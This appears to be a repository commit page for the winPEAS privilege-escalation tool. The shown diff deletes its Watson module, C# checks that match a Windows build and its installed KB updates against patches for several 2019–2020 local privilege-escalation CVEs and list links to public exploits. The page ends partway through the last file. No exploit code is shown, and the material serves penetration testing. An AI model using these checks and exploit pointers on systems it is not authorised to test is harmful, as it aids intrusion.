github/PEASS-ng
1
Fork 0
mirror of https://github.com/carlospolop/PEASS-ng synced 2024-11-20 12:39:21 +01:00
Code Releases Activity

Google Password Sync

Browse Source
This commit is contained in:
Carlos Polop 2024-10-11 01:51:45 +01:00
parent eebe7974a9
commit abd4aa59cd
23 changed files with 389 additions and 1475 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

105
winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-0836.cs vendored
View File

@ -1,105 +0,0 @@
using System.Collections.Generic;
using System.Linq;
namespace winPEAS._3rdParty.Watson.Msrc
{
internal static class CVE_2019_0836
{
private const string name = "CVE-2019-0836";
public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List<int> installedKBs)
{
var supersedence = new List<int>();
switch (buildNumber)
{
case 10240:
supersedence.AddRange(new int[] {
4493475, 4498375, 4499154, 4505051, 4503291,
4507458, 4512497, 4517276, 4522009, 4520011,
4524153, 4525232, 4530681, 4534306, 4537776,
4540693, 4550930, 4556826, 4561649, 4567518,
4565513, 4571692, 4577049
});
break;
case 14393:
supersedence.AddRange(new int[] {
4493470, 4499418, 4494440, 4534271, 4534307,
4537764, 4537806, 4540670, 4541329, 4550929,
4550947, 4556813, 4561616, 4567517, 4565511,
4571694, 4577015
});
break;
case 15063:
supersedence.AddRange(new int[] {
4493474, 4493436, 4499162, 4499181, 4502112,
4505055, 4503279, 4503289, 4509476, 4507450,
4507467, 4512474, 4512507, 4516059, 4516068,
4522011, 4520010, 4524151, 4525245, 4530711,
4534296, 4537765, 4540705, 4550939, 4556804,
4561605, 4567516, 4565499, 4571689, 4577021
});
break;
case 16299:
supersedence.AddRange(new int[] {
4493441, 4493440, 4499147, 4499179, 4505062,
4503281, 4503284, 4509477, 4507455, 4507465,
4512494, 4512516, 4516066, 4522012, 4520004,
4520006, 4524150, 4525241, 4530714, 4534276,
4534318, 4537789, 4537816, 4540681, 4541330,
4554342, 4550927, 4556812, 4561602, 4567515,
4565508, 4571741, 4577041
});
break;
case 17134:
supersedence.AddRange(new int[] {
4493464, 4493437, 4499167, 4499183, 4505064,
4503286, 4503288, 4509478, 4507435, 4507466,
4512501, 4512509, 4516045, 4516058, 4522014,
4519978, 4520008, 4524149, 4525237, 4530717,
4534293, 4534308, 4537762, 4537795, 4540689,
4541333, 4554349, 4550922, 4550944, 4556807,
4561621, 4567514, 4565489, 4571709, 4577032
});
break;
case 17763:
supersedence.AddRange(new int[] {
4493509, 4495667, 4494441, 4497934, 4501835,
4505056, 4501371, 4503327, 4509479, 4505658,
4507469, 4511553, 4512534, 4512578, 4522015,
4519338, 4520062, 4524148, 4523205, 4530715,
4534273, 4534321, 4532691, 4537818, 4538461,
4541331, 4554354, 4549949, 4550969, 4551853,
4561608, 4567513, 4558998, 4559003, 4565349,
4571748, 4570333, 4577069
});
break;
default:
return;
}
if (!supersedence.Intersect(installedKBs).Any())
{
vulnerabilities.SetAsVulnerable(name);
}
}
}
}

82
winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-0841.cs vendored
View File

@ -1,82 +0,0 @@
using System.Collections.Generic;
using System.Linq;
namespace winPEAS._3rdParty.Watson.Msrc
{
internal static class CVE_2019_0841
{
private const string name = "CVE-2019-0841";
public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List<int> installedKBs)
{
var supersedence = new List<int>();
switch (buildNumber)
{
case 15063:
supersedence.AddRange(new int[] {
4493474, 4493436, 4499162, 4499181, 4502112,
4505055, 4503279, 4503289, 4509476, 4507450,
4507467, 4512474, 4512507, 4516059, 4516068,
4522011, 4520010, 4524151, 4525245, 4530711,
4534296, 4537765, 4540705, 4550939, 4556804,
4561605, 4567516, 4565499, 4571689, 4577021
});
break;
case 16299:
supersedence.AddRange(new int[] {
4493441, 4493440, 4499147, 4499179, 4505062,
4503281, 4503284, 4509477, 4507455, 4507465,
4512494, 4512516, 4516066, 4522012, 4520004,
4520006, 4524150, 4525241, 4530714, 4534276,
4534318, 4537789, 4537816, 4540681, 4541330,
4554342, 4550927, 4556812, 4561602, 4567515,
4565508, 4571741, 4577041
});
break;
case 17134:
supersedence.AddRange(new int[] {
4493464, 4493437, 4499167, 4499183, 4505064,
4503286, 4503288, 4509478, 4507435, 4507466,
4512501, 4512509, 4516045, 4516058, 4522014,
4519978, 4520008, 4524149, 4525237, 4530717,
4534293, 4534308, 4537762, 4537795, 4540689,
4541333, 4554349, 4550922, 4550944, 4556807,
4561621, 4567514, 4565489, 4571709, 4577032
});
break;
case 17763:
supersedence.AddRange(new int[] {
4493509, 4495667, 4494441, 4497934, 4501835,
4505056, 4501371, 4503327, 4509479, 4505658,
4507469, 4511553, 4512534, 4512578, 4522015,
4519338, 4520062, 4524148, 4523205, 4530715,
4534273, 4534321, 4532691, 4537818, 4538461,
4541331, 4554354, 4549949, 4550969, 4551853,
4561608, 4567513, 4558998, 4559003, 4565349,
4571748, 4570333, 4577069
});
break;
default:
return;
}
if (!supersedence.Intersect(installedKBs).Any())
{
vulnerabilities.SetAsVulnerable(name);
}
}
}
}

102
winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1064.cs vendored
View File

@ -1,102 +0,0 @@
using System.Collections.Generic;
using System.Linq;
namespace winPEAS._3rdParty.Watson.Msrc
{
internal static class CVE_2019_1064
{
private const string name = "CVE-2019-1064";
public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List<int> installedKBs)
{
var supersedence = new List<int>();
switch (buildNumber)
{
case 14393:
supersedence.AddRange(new int[] {
4503267, 4503294, 4509475, 4507459, 4507460,
4512495, 4512517, 4516044, 4516061, 4522010,
4519998, 4524152, 4525236, 4530689
});
break;
case 15063:
supersedence.AddRange(new int[] {
4503279, 4503289, 4509476, 4507450, 4507467,
4512474, 4512507, 4516059, 4516068, 4522011,
4520010, 4524151, 4525245, 4530711, 4534296,
4537765, 4540705, 4550939, 4556804, 4561605,
4567516, 4565499, 4571689, 4577021
});
break;
case 16299:
supersedence.AddRange(new int[] {
4503284, 4503281, 4509477, 4507455, 4507465,
4512494, 4512516, 4516066, 4522012, 4520004,
4520006, 4524150, 4525241, 4530714, 4534276,
4534318, 4537789, 4537816, 4540681, 4541330,
4554342, 4550927, 4556812, 4561602, 4567515,
4565508, 4571741, 4577041
});
break;
case 17134:
supersedence.AddRange(new int[] {
4503286, 4503288, 4509478, 4507435, 4507466,
4512501, 4512509, 4516045, 4516058, 4522014,
4519978, 4520008, 4524149, 4525237, 4530717,
4534293, 4534308, 4537762, 4537795, 4540689,
4541333, 4554349, 4550922, 4550944, 4556807,
4561621, 4567514, 4565489, 4571709, 4577032
});
break;
case 17763:
supersedence.AddRange(new int[] {
4503327, 4501371, 4509479, 4505658, 4507469,
4511553, 4512534, 4512578, 4522015, 4519338,
4520062, 4524148, 4523205, 4530715, 4534273,
4534321, 4532691, 4537818, 4538461, 4541331,
4554354, 4549949, 4550969, 4551853, 4561608,
4567513, 4558998, 4559003, 4565349, 4571748,
4570333, 4577069
});
break;
case 18362:
supersedence.AddRange(new int[] {
4503293, 4501375, 4505903, 4507453, 4512508,
4512941, 4515384, 4517211, 4522016, 4517389,
4522355, 4524147, 4524570, 4530684, 4528760,
4532695, 4532693, 4535996, 4540673, 4541335,
4551762, 4554364, 4549951, 4550945, 4556799,
4560960, 4567512, 4565483, 4559004, 4565351,
4566116, 4574727, 4577062
});
break;
default:
return;
}
if (!supersedence.Intersect(installedKBs).Any())
{
vulnerabilities.SetAsVulnerable(name);
}
}
}
}

109
winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1130.cs vendored
View File

@ -1,109 +0,0 @@
using System.Collections.Generic;
using System.Linq;
namespace winPEAS._3rdParty.Watson.Msrc
{
internal static class CVE_2019_1130
{
private const string name = "CVE-2019-1130";
public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List<int> installedKBs)
{
var supersedence = new List<int>();
switch (buildNumber)
{
case 10240:
supersedence.AddRange(new int[] {
4507458, 4512497, 4517276, 4522009, 4520011,
4524153, 4525232, 4530681, 4534306, 4537776,
4540693, 4550930, 4556826, 4561649, 4567518,
4565513, 4571692, 4577049
});
break;
case 14393:
supersedence.AddRange(new int[] {
4507460, 4507459, 4512495, 4512517, 4516044,
4516061, 4522010, 4519998, 4524152, 4525236,
4530689
});
break;
case 15063:
supersedence.AddRange(new int[] {
4507460, 4507459, 4512495, 4512517, 4516044,
4516061, 4522010, 4519998, 4524152, 4525236,
4530689
});
break;
case 16299:
supersedence.AddRange(new int[] {
4507455, 4507465, 4512494, 4512516, 4516066,
4522012, 4520004, 4520006, 4524150, 4525241,
4530714, 4534276, 4534318, 4537789, 4537816,
4540681, 4541330, 4554342, 4550927, 4556812,
4561602, 4567515, 4565508, 4571741, 4577041
});
break;
case 17134:
supersedence.AddRange(new int[] {
4507435, 4507466, 4512501, 4512509, 4516045,
4516058, 4522014, 4519978, 4520008, 4524149,
4525237, 4530717, 4534293, 4534308, 4537762,
4537795, 4540689, 4541333, 4554349, 4550922,
4550944, 4556807, 4561621, 4567514, 4565489,
4571709, 4577032
});
break;
case 17763:
supersedence.AddRange(new int[] {
4507469, 4505658, 4511553, 4512534, 4512578,
4522015, 4519338, 4520062, 4524148, 4523205,
4530715, 4534273, 4534321, 4532691, 4537818,
4538461, 4541331, 4554354, 4549949, 4550969,
4551853, 4561608, 4567513, 4558998, 4559003,
4565349, 4571748, 4570333, 4577069
});
break;
case 18362:
supersedence.AddRange(new int[] {
4507453, 4505903, 4512508, 4512941, 4515384,
4517211, 4522016, 4517389, 4522355, 4524147,
4524570, 4530684, 4528760, 4532695, 4532693,
4535996, 4540673, 4541335, 4551762, 4554364,
4549951, 4550945, 4556799, 4560960, 4567512,
4565483, 4559004, 4565351, 4566116, 4574727,
4577062
});
break;
default:
return;
}
if (!supersedence.Intersect(installedKBs).Any())
{
vulnerabilities.SetAsVulnerable(name);
}
}
}
}

86
winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1253.cs vendored
View File

@ -1,86 +0,0 @@
using System.Collections.Generic;
using System.Linq;
namespace winPEAS._3rdParty.Watson.Msrc
{
internal static class CVE_2019_1253
{
private const string name = "CVE-2019-1253";
public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List<int> installedKBs)
{
var supersedence = new List<int>();
switch (buildNumber)
{
case 15063:
supersedence.AddRange(new int[] {
4516068, 4516059, 4522011, 4520010, 4524151,
4525245, 4530711, 4534296, 4537765, 4540705,
4550939, 4556804, 4561605, 4567516, 4565499,
4571689, 4577021
});
break;
case 16299:
supersedence.AddRange(new int[] {
4516066, 4522012, 4520004, 4520006, 4524150,
4525241, 4530714, 4534276, 4534318, 4537789,
4537816, 4540681, 4541330, 4554342, 4550927,
4556812, 4561602, 4567515, 4565508, 4571741,
4577041
});
break;
case 17134:
supersedence.AddRange(new int[] {
4516058, 4516045, 4522014, 4519978, 4520008,
4524149, 4525237, 4530717, 4534293, 4534308,
4537762, 4537795, 4540689, 4541333, 4554349,
4550922, 4550944, 4556807, 4561621, 4567514,
4565489, 4571709, 4577032
});
break;
case 17763:
supersedence.AddRange(new int[] {
4512578, 4522015, 4519338, 4520062, 4524148,
4523205, 4530715, 4534273, 4534321, 4532691,
4537818, 4538461, 4541331, 4554354, 4549949,
4550969, 4551853, 4561608, 4567513, 4558998,
4559003, 4565349, 4571748, 4570333, 4577069
});
break;
case 18362:
supersedence.AddRange(new int[] {
4515384, 4517211, 4522016, 4517389, 4522355,
4524147, 4524570, 4530684, 4528760, 4532695,
4532693, 4535996, 4540673, 4541335, 4551762,
4554364, 4549951, 4550945, 4556799, 4560960,
4567512, 4565483, 4559004, 4565351, 4566116,
4574727, 4577062
});
break;
default:
return;
}
if (!supersedence.Intersect(installedKBs).Any())
{
vulnerabilities.SetAsVulnerable(name);
}
}
}
}

100
winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1315.cs vendored
View File

@ -1,100 +0,0 @@
using System.Collections.Generic;
using System.Linq;
namespace winPEAS._3rdParty.Watson.Msrc
{
internal static class CVE_2019_1315
{
private const string name = "CVE-2019-1315";
public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List<int> installedKBs)
{
var supersedence = new List<int>();
switch (buildNumber)
{
case 10240:
supersedence.AddRange(new int[] {
4520011, 4525232, 4530681, 4534306, 4537776,
4540693, 4550930, 4556826, 4561649, 4567518,
4565513, 4571692, 4577049
});
break;
case 14393:
supersedence.AddRange(new int[] {
4519998, 4519979, 4525236, 4530689
});
break;
case 15063:
supersedence.AddRange(new int[] {
4520010, 4525245, 4530711, 4534296, 4537765,
4540705, 4550939, 4556804, 4561605, 4567516,
4565499, 4571689, 4577021
});
break;
case 16299:
supersedence.AddRange(new int[] {
4520004, 4520006, 4525241, 4530714, 4534276,
4534318, 4537789, 4537816, 4540681, 4541330,
4554342, 4550927, 4556812, 4561602, 4567515,
4565508, 4571741, 4577041
});
break;
case 17134:
supersedence.AddRange(new int[] {
4520008, 4519978, 4525237, 4530717, 4534293,
4534308, 4537762, 4537795, 4540689, 4541333,
4554349, 4550922, 4550944, 4556807, 4561621,
4567514, 4565489, 4571709, 4577032
});
break;
case 17763:
supersedence.AddRange(new int[] {
4519338, 4520062, 4523205, 4530715, 4534273,
4534321, 4532691, 4537818, 4538461, 4541331,
4554354, 4549949, 4550969, 4551853, 4561608,
4567513, 4558998, 4559003, 4565349, 4571748,
4570333, 4577069
});
break;
case 18362:
supersedence.AddRange(new int[] {
4517389, 4522355, 4524570, 4530684, 4528760,
4532695, 4532693, 4535996, 4540673, 4541335,
4551762, 4554364, 4549951, 4550945, 4556799,
4560960, 4567512, 4565483, 4559004, 4565351,
4566116, 4574727, 4577062
});
break;
default:
return;
}
if (!supersedence.Intersect(installedKBs).Any())
{
vulnerabilities.SetAsVulnerable(name);
}
}
}
}

83
winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1385.cs vendored
View File

@ -1,83 +0,0 @@
using System.Collections.Generic;
using System.Linq;
namespace winPEAS._3rdParty.Watson.Msrc
{
internal static class CVE_2019_1385
{
private const string name = "CVE-2019-1385";
public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List<int> installedKBs)
{
var supersedence = new List<int>();
switch (buildNumber)
{
case 16299:
supersedence.AddRange(new int[] {
4525241, 4530714, 4534276, 4534318, 4537789,
4537816, 4540681, 4541330, 4554342, 4550927,
4556812, 4561602, 4567515, 4565508, 4571741,
4577041
});
break;
case 17134:
supersedence.AddRange(new int[] {
4525237, 4530717, 4534293, 4534308, 4537762,
4537795, 4540689, 4541333, 4554349, 4550922,
4550944, 4556807, 4561621, 4567514, 4565489,
4571709, 4577032
});
break;
case 17763:
supersedence.AddRange(new int[] {
4523205, 4530715, 4534273, 4534321, 4532691,
4537818, 4538461, 4541331, 4554354, 4549949,
4550969, 4551853, 4561608, 4567513, 4558998,
4559003, 4565349, 4571748, 4570333, 4577069
});
break;
case 18362:
supersedence.AddRange(new int[] {
4524570, 4530684, 4528760, 4532695, 4532693,
4535996, 4540673, 4541335, 4551762, 4554364,
4549951, 4550945, 4556799, 4560960, 4567512,
4565483, 4559004, 4565351, 4566116, 4574727,
4577062
});
break;
case 18363:
supersedence.AddRange(new int[] {
4524570, 4530684, 4528760, 4532695, 4532693,
4535996, 4540673, 4541335, 4551762, 4554364,
4549951, 4550945, 4556799, 4560960, 4567512,
4565483, 4559004, 4565351, 4566116, 4574727,
4577062
});
break;
default:
return;
}
if (!supersedence.Intersect(installedKBs).Any())
{
vulnerabilities.SetAsVulnerable(name);
}
}
}
}

89
winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1388.cs vendored
View File

@ -1,89 +0,0 @@
using System.Collections.Generic;
using System.Linq;
namespace winPEAS._3rdParty.Watson.Msrc
{
internal static class CVE_2019_1388
{
private const string name = "CVE-2019-1388";
public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List<int> installedKBs)
{
var supersedence = new List<int>();
switch (buildNumber)
{
case 10240:
supersedence.AddRange(new int[] {
4525232, 4530681, 4534306, 4537776, 4540693,
4550930, 4556826, 4561649, 4567518, 4565513,
4571692, 4577049
});
break;
case 14393:
supersedence.AddRange(new int[] {
4525236, 4530689
});
break;
case 16299:
supersedence.AddRange(new int[] {
4525241, 4530714, 4534276, 4534318, 4537789,
4537816, 4540681, 4541330, 4554342, 4550927,
4556812, 4561602, 4567515, 4565508, 4571741,
4577041
});
break;
case 17134:
supersedence.AddRange(new int[] {
4525237, 4530717, 4534293, 4534308, 4537762,
4537795, 4540689, 4541333, 4554349, 4550922,
4550944, 4556807, 4561621, 4567514, 4565489,
4571709, 4577032
});
break;
case 17763:
supersedence.AddRange(new int[] {
4523205, 4530715, 4534273, 4534321, 4532691,
4537818, 4538461, 4541331, 4554354, 4549949,
4550969, 4551853, 4561608, 4567513, 4558998,
4559003, 4565349, 4571748, 4570333, 4577069
});
break;
case 18362:
supersedence.AddRange(new int[] {
4524570, 4530684, 4528760, 4532695, 4532693,
4535996, 4540673, 4541335, 4551762, 4554364,
4549951, 4550945, 4556799, 4560960, 4567512,
4565483, 4559004, 4565351, 4566116, 4574727,
4577062
});
break;
default:
return;
}
if (!supersedence.Intersect(installedKBs).Any())
{
vulnerabilities.SetAsVulnerable(name);
}
}
}
}

101
winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2019-1405.cs vendored
View File

@ -1,101 +0,0 @@
using System.Collections.Generic;
using System.Linq;
namespace winPEAS._3rdParty.Watson.Msrc
{
internal static class CVE_2019_1405
{
private const string name = "CVE-2019-1405";
public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List<int> installedKBs)
{
var supersedence = new List<int>();
switch (buildNumber)
{
case 10240:
supersedence.AddRange(new int[] {
4525232, 4530681, 4534306, 4537776, 4540693,
4550930, 4556826, 4561649, 4567518, 4565513,
4571692, 4577049
});
break;
case 14393:
supersedence.AddRange(new int[] {
4525236, 4530689
});
break;
case 16299:
supersedence.AddRange(new int[] {
4525241, 4530714, 4534276, 4534318, 4537789,
4537816, 4540681, 4541330, 4554342, 4550927,
4556812, 4561602, 4567515, 4565508, 4571741,
4577041
});
break;
case 17134:
supersedence.AddRange(new int[] {
4525237, 4530717, 4534293, 4534308, 4537762,
4537795, 4540689, 4541333, 4554349, 4550922,
4550944, 4556807, 4561621, 4567514, 4565489,
4571709, 4577032
});
break;
case 17763:
supersedence.AddRange(new int[] {
4523205, 4530715, 4534273, 4534321, 4532691,
4537818, 4538461, 4541331, 4554354, 4549949,
4550969, 4551853, 4561608, 4567513, 4558998,
4559003, 4565349, 4571748, 4570333, 4577069
});
break;
case 18362:
supersedence.AddRange(new int[] {
4524570, 4530684, 4528760, 4532695, 4532693,
4535996, 4540673, 4541335, 4551762, 4554364,
4549951, 4550945, 4556799, 4560960, 4567512,
4565483, 4559004, 4565351, 4566116, 4574727,
4577062
});
break;
case 18363:
supersedence.AddRange(new int[] {
4524570, 4530684, 4528760, 4532695, 4532693,
4535996, 4540673, 4541335, 4551762, 4554364,
4549951, 4550945, 4556799, 4560960, 4567512,
4565483, 4559004, 4565351, 4566116, 4574727,
4577062
});
break;
default:
return;
}
if (!supersedence.Intersect(installedKBs).Any())
{
vulnerabilities.SetAsVulnerable(name);
}
}
}
}

98
winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2020-0668.cs vendored
View File

@ -1,98 +0,0 @@
using System.Collections.Generic;
using System.Linq;
namespace winPEAS._3rdParty.Watson.Msrc
{
internal static class CVE_2020_0668
{
private const string name = "CVE-2020-0668";
public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List<int> installedKBs)
{
var supersedence = new List<int>();
switch (buildNumber)
{
case 10240:
supersedence.AddRange(new int[] {
4537776, 4540693, 4550930, 4556826, 4561649,
4567518, 4565513, 4571692, 4577049
});
break;
case 14393:
supersedence.AddRange(new int[] {
4537764, 4537806, 4540670, 4541329, 4550929,
4550947, 4556813, 4561616, 4567517, 4565511,
4571694, 4577015
});
break;
case 16299:
supersedence.AddRange(new int[] {
4537789, 4537816, 4540681, 4541330, 4554342,
4550927, 4556812, 4561602, 4567515, 4565508,
4571741, 4577041
});
break;
case 17134:
supersedence.AddRange(new int[] {
4537762, 4537795, 4540689, 4541333, 4554349,
4550922, 4550944, 4556807, 4561621, 4567514,
4565489, 4571709, 4577032
});
break;
case 17763:
supersedence.AddRange(new int[] {
4532691, 4537818, 4538461, 4541331, 4554354,
4549949, 4550969, 4551853, 4561608, 4567513,
4558998, 4559003, 4565349, 4571748, 4570333,
4577069
});
break;
case 18362:
supersedence.AddRange(new int[] {
4532693, 4535996, 4540673, 4541335, 4551762,
4554364, 4549951, 4550945, 4556799, 4560960,
4567512, 4565483, 4559004, 4565351, 4566116,
4574727, 4577062
});
break;
case 18363:
supersedence.AddRange(new int[] {
4532693, 4535996, 4540673, 4541335, 4551762,
4554364, 4549951, 4550945, 4556799, 4560960,
4567512, 4565483, 4559004, 4565351, 4566116,
4574727, 4577062
});
break;
default:
return;
}
if (!supersedence.Intersect(installedKBs).Any())
{
vulnerabilities.SetAsVulnerable(name);
}
}
}
}

98
winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2020-0683.cs vendored
View File

@ -1,98 +0,0 @@
using System.Collections.Generic;
using System.Linq;
namespace winPEAS._3rdParty.Watson.Msrc
{
internal static class CVE_2020_0683
{
private const string name = "CVE-2020-0683";
public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List<int> installedKBs)
{
var supersedence = new List<int>();
switch (buildNumber)
{
case 10240:
supersedence.AddRange(new int[] {
4537776, 4540693, 4550930, 4556826, 4561649,
4567518, 4565513, 4571692, 4577049
});
break;
case 14393:
supersedence.AddRange(new int[] {
4537764, 4537806, 4540670, 4541329, 4550929,
4550947, 4556813, 4561616, 4567517, 4565511,
4571694, 4577015
});
break;
case 16299:
supersedence.AddRange(new int[] {
4537789, 4537816, 4540681, 4541330, 4554342,
4550927, 4556812, 4561602, 4567515, 4565508,
4571741, 4577041
});
break;
case 17134:
supersedence.AddRange(new int[] {
4537762, 4537795, 4540689, 4541333, 4554349,
4550922, 4550944, 4556807, 4561621, 4567514,
4565489, 4571709, 4577032
});
break;
case 17763:
supersedence.AddRange(new int[] {
4532691, 4537818, 4538461, 4541331, 4554354,
4549949, 4550969, 4551853, 4561608, 4567513,
4558998, 4559003, 4565349, 4571748, 4570333,
4577069
});
break;
case 18362:
supersedence.AddRange(new int[] {
4532693, 4535996, 4540673, 4541335, 4551762,
4554364, 4549951, 4550945, 4556799, 4560960,
4567512, 4565483, 4559004, 4565351, 4566116,
4574727, 4577062
});
break;
case 18363:
supersedence.AddRange(new int[] {
4532693, 4535996, 4540673, 4541335, 4551762,
4554364, 4549951, 4550945, 4556799, 4560960,
4567512, 4565483, 4559004, 4565351, 4566116,
4574727, 4577062
});
break;
default:
return;
}
if (!supersedence.Intersect(installedKBs).Any())
{
vulnerabilities.SetAsVulnerable(name);
}
}
}
}

35
winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2020-0796.cs vendored
View File

@ -1,35 +0,0 @@
using System.Linq;
using System.Collections.Generic;
namespace winPEAS._3rdParty.Watson.Msrc
{
internal static class CVE_2020_0796
{
private const string name = "CVE-2020-0796";
public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List<int> installedKBs)
{
var supersedence = new List<int>();
switch (buildNumber)
{
case 18362:
case 18363:
supersedence.AddRange(new int[] {
4551762
});
break;
default:
return;
}
if (!supersedence.Intersect(installedKBs).Any())
{
vulnerabilities.SetAsVulnerable(name);
}
}
}
}

90
winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Msrc/CVE-2020-1013.cs vendored
View File

@ -1,90 +0,0 @@
using System.Collections.Generic;
using System.Linq;
namespace winPEAS._3rdParty.Watson.Msrc
{
internal static class CVE_2020_1013
{
private const string name = "CVE-2020-1013";
public static void Check(VulnerabilityCollection vulnerabilities, int buildNumber, List<int> installedKBs)
{
var supersedence = new List<int>();
switch (buildNumber)
{
case 10240:
supersedence.AddRange(new int[] {
4577049
});
break;
case 14393:
supersedence.AddRange(new int[] {
4577015
});
break;
case 16299:
supersedence.AddRange(new int[] {
4577041
});
break;
case 17134:
supersedence.AddRange(new int[] {
4577032
});
break;
case 17763:
supersedence.AddRange(new int[] {
4570333, 4577069
});
break;
case 18362:
supersedence.AddRange(new int[] {
4574727, 4577062
});
break;
case 18363:
supersedence.AddRange(new int[] {
4574727, 4577062
});
break;
case 19041:
supersedence.AddRange(new int[] {
4571756, 4577063
});
break;
default:
return;
}
if (!supersedence.Intersect(installedKBs).Any())
{
vulnerabilities.SetAsVulnerable(name);
}
}
}
}

18
winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Vulnerability.cs vendored
View File

@ -1,18 +0,0 @@
namespace winPEAS._3rdParty.Watson
{
public class Vulnerability
{
public string Identification { get; }
public string[] KnownExploits { get; }
public bool Vulnerable { get; private set; }
public Vulnerability(string id, string[] exploits)
{
Identification = id;
KnownExploits = exploits;
}
public void SetAsVulnerable()
=> Vulnerable = true;
}
}

111
winPEAS/winPEASexe/winPEAS/3rdParty/Watson/VulnerabilityCollection.cs vendored
View File

@ -1,111 +0,0 @@
using System;
using System.Collections.Generic;
using System.Linq;
using winPEAS.Helpers;
namespace winPEAS._3rdParty.Watson
{
public class VulnerabilityCollection
{
private readonly List<Vulnerability> _vulnerabilities;
public void SetAsVulnerable(string id)
=> _vulnerabilities.First(e => e.Identification == id).SetAsVulnerable();
public VulnerabilityCollection()
{
_vulnerabilities = Populate();
}
public void ShowResults()
{
foreach (Vulnerability vuln in _vulnerabilities.Where(i => i.Vulnerable))
{
Beaprint.BadPrint($" [!] {vuln.Identification} : VULNERABLE");
foreach (string exploit in vuln.KnownExploits)
{
Beaprint.BadPrint($" [>] {exploit}");
}
Console.WriteLine();
}
if (_vulnerabilities.Any(e => e.Vulnerable))
{
Beaprint.BadPrint($" [*] Finished. Found {_vulnerabilities.Count(i => i.Vulnerable)} potential vulnerabilities.\r\n");
}
else
{
Beaprint.GoodPrint(" [*] Finished. Found 0 vulnerabilities.\r\n");
}
}
private List<Vulnerability> Populate()
{
return new List<Vulnerability>()
{
new Vulnerability(
id: "CVE-2019-0836",
exploits: new string[] { "https://exploit-db.com/exploits/46718", "https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/" }
),
new Vulnerability(
id: "CVE-2019-0841",
exploits: new string[] { "https://github.com/rogue-kdc/CVE-2019-0841", "https://rastamouse.me/tags/cve-2019-0841/" }
),
new Vulnerability(
id: "CVE-2019-1064",
exploits: new string[] { "https://www.rythmstick.net/posts/cve-2019-1064/" }
),
new Vulnerability(
id: "CVE-2019-1130",
exploits: new string[] { "https://github.com/S3cur3Th1sSh1t/SharpByeBear" }
),
new Vulnerability(
id: "CVE-2019-1253",
exploits: new string[] { "https://github.com/padovah4ck/CVE-2019-1253", "https://github.com/sgabe/CVE-2019-1253" }
),
new Vulnerability(
id: "CVE-2019-1315",
exploits: new string[] { "https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html" }
),
new Vulnerability(
id: "CVE-2019-1385",
exploits: new string[] { "https://www.youtube.com/watch?v=K6gHnr-VkAg" }
),
new Vulnerability(
id: "CVE-2019-1388",
exploits: new string[] { "https://github.com/jas502n/CVE-2019-1388" }
),
new Vulnerability(
id: "CVE-2019-1405",
exploits: new string[] { "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/", "https://github.com/apt69/COMahawk" }
),
new Vulnerability(
id: "CVE-2020-0668",
exploits: new string[] { "https://github.com/itm4n/SysTracingPoc" }
),
new Vulnerability(
id: "CVE-2020-0683",
exploits: new string[] { "https://github.com/padovah4ck/CVE-2020-0683", "https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/cve-2020-0683.ps1" }
),
new Vulnerability(
id: "CVE-2020-1013",
exploits: new string[] { "https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/" }
),
new Vulnerability(
id: "CVE-2020-0796",
exploits: new string[] { "https://github.com/danigargu/CVE-2020-0796 (smbghost)" }
)
};
}
}
}

80
winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Watson.cs vendored
View File

@ -1,80 +0,0 @@
using System;
using System.Collections.Generic;
using winPEAS.Helpers;
using winPEAS._3rdParty.Watson.Msrc;
namespace winPEAS._3rdParty.Watson
{
//////////////////////////////
////// MAIN WATSON CLASS /////
//////////////////////////////
class Watson
{
public static void FindVulns()
{
Console.WriteLine(Beaprint.YELLOW + " [?] " + Beaprint.LBLUE + "Windows vulns search powered by " + Beaprint.LRED + "Watson" + Beaprint.LBLUE + "(https://github.com/rasta-mouse/Watson)" + Beaprint.NOCOLOR);
// Supported versions
var supportedVersions = new Dictionary<int, string>()
{
{ 10240, "1507" }, { 10586, "1511" }, { 14393, "1607" }, { 15063, "1703" }, { 16299, "1709" },
{ 17134, "1803" }, { 17763, "1809" }, { 18362, "1903" }, { 18363, "1909" }, { 19041, "2004" },
{ 19042, "20H2" }, { 22000, "21H2" }, { 22621, "22H2" }
};
// Get OS Build number
var buildNumber = Wmi.GetBuildNumber();
if (buildNumber != 0)
{
if (!supportedVersions.ContainsKey(buildNumber))
{
